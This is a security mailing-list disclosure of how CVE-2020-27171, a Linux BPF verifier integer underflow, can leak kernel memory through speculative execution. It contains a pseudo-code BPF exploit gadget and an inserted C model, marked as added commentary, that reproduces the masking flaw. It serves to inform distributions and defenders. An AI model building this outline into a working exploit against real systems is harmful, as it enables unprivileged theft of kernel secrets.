Re: [CVE-2020-27171] Numeric error when restricting speculative pointer arithmetic allows unprivileged local users to leak content of kernel memory

Related Vulnerabilities: CVE-2020-27171

oss-sec
mailing list archives
From: Piotr Krysiuk <piotras () gmail com>

Date: Wed, 24 Mar 2021 19:38:11 +0000

Some details of how CVE-2020-27171 could be exploited in practice were
provided via the linux-distros mailing list with a 7-day embargo. This was
intended to help any affected Linux distributions to assess the risk
and decide about any appropriate actions.

As the embargo expires today, I was asked to share these details
publicly on oss-security.

The CVE-2020-27171 vulnerability has been successfully reproduced
against Linux kernel v5.12-rc3 using the following logic for a BPF
program attached to a socket:

    load pointer to our big array into BPF_REG_MAP_PTR,
    load offset of data to leak into BPF_REG_OFFSET,

    BPF_MOV64_REG(BPF_REG_OOB_ADDRESS, BPF_REG_MAP_PTR),

    // load any slowly-loaded value...
    BPF_LDX_MEM(BPF_DW, BPF_REG_SLOW_CHECK, BPF_REG_MAP_PTR, 0x1200),

    // ... and turn it into known zero for verifier,
    // while preserving slowly-loaded dependency for affected hardware
    BPF_ALU64_IMM(BPF_AND, BPF_REG_SLOW_CHECK, 1),
    BPF_ALU64_IMM(BPF_AND, BPF_REG_SLOW_CHECK, 2),

    // speculatively bypassed offset check
    BPF_JMP_REG(BPF_JNE, BPF_REG_OFFSET, BPF_REG_SLOW_CHECK,
                skip_speculation),

    // speculatively subtract masked BPF_REG_OFFSET from BPF_REG_OOB_ADDRESS,
    // where incorrect mask value 0xffffffff is used due to integer underflow
    BPF_ALU64_REG(BPF_SUB, BPF_REG_OOB_ADDRESS, BPF_REG_OFFSET),

    // speculatively out-of-bounds load
    BPF_LDX_MEM(BPF_B, BPF_REG_LEAKED_BYTE, BPF_REG_OOB_ADDRESS, 0),

    transmit speculatively loaded BPF_REG_LEAKED_BYTE via side-channel,

The full reproducers were shared with a number of Linux distributions
for protection purposes.
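The "incorrect mask value 0xffffffff" the gadget above relies on can be reproduced in plain integer arithmetic. The following is an added model, not code from the mail or from the kernel: it mirrors my reading of the verifier's Spectre-v1 pointer-ALU masking sequence (sanitize_ptr_alu) and of the left-direction limit for a map-value pointer (retrieve_ptr_limit), and compares the pre-fix seed `alu_limit - 1`, which wraps when the limit is 0, with the post-fix seed `alu_limit`. Helper names and the constructed scenario are mine.

```c
/* Added model of the verifier's pointer-ALU masking and the
 * CVE-2020-27171 underflow. Assumption: the sequence and the limit rule
 * below follow my reading of the kernel source, not the mail itself. */
#include <stdint.h>
#include <stdio.h>

/* Instruction sequence the verifier patches in before a pointer ALU op,
 * with BPF_REG_AX seeded from a 32-bit immediate:
 *   AX -= off; AX |= off; AX = -AX; AX = AX >>s 63; AX &= off
 * Returns 'off' when it lies within the seeded limit, else 0. */
static uint64_t mask_offset(uint32_t ax_init, uint64_t off)
{
    uint64_t ax = ax_init;        /* BPF_MOV32_IMM zero-extends to 64 bit */
    ax -= off;                    /* BPF_SUB: negative iff off > ax_init */
    ax |= off;                    /* BPF_OR: keeps the sign bit if set */
    ax = 0 - ax;                  /* BPF_NEG, two's complement wrap */
    ax = (ax >> 63) ? ~0ULL : 0;  /* BPF_ARSH 63: all ones or zero */
    return ax & off;              /* BPF_AND: pass or zero the offset */
}

/* Left-direction limit for a map-value pointer (BPF_SUB of a non-negative
 * offset): how many bytes lie between the pointer and the value start. */
static uint32_t map_limit_left(uint32_t umax_value, int32_t fixed_off)
{
    return umax_value + (uint32_t)fixed_off;
}

/* Pre-fix seed: alu_limit - 1 in u32, so a limit of 0 becomes 0xffffffff
 * and every offset passes the mask. */
static uint32_t seed_prefix(uint32_t alu_limit)  { return alu_limit - 1; }
/* Post-fix seed: the limit itself; a limit of 0 zeroes every offset. */
static uint32_t seed_postfix(uint32_t alu_limit) { return alu_limit; }

int main(void)
{
    /* Constructed scenario matching the mail: pointer at the start of its
     * map value (no room to the left), large offset subtracted. */
    uint32_t limit = map_limit_left(0, 0);
    uint64_t off = 0x100000;
    printf("limit=%u pre-fix seed=0x%08x -> offset passes as 0x%llx\n",
           limit, seed_prefix(limit),
           (unsigned long long)mask_offset(seed_prefix(limit), off));
    printf("post-fix seed=0x%08x -> offset becomes 0x%llx\n",
           seed_postfix(limit),
           (unsigned long long)mask_offset(seed_postfix(limit), off));
    return 0;
}
```

With a non-zero limit both seeds behave as intended (offsets up to the limit pass, larger ones are zeroed); only the limit-0 case differs, which is exactly the position the gadget places its pointer in.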

Current thread:

[CVE-2020-27171] Numeric error when restricting speculative pointer arithmetic allows unprivileged local users to leak content of kernel memory Piotr Krysiuk (Mar 18)

Re: [CVE-2020-27171] Numeric error when restricting speculative pointer arithmetic allows unprivileged local users to leak content of kernel memory Piotr Krysiuk (Mar 24)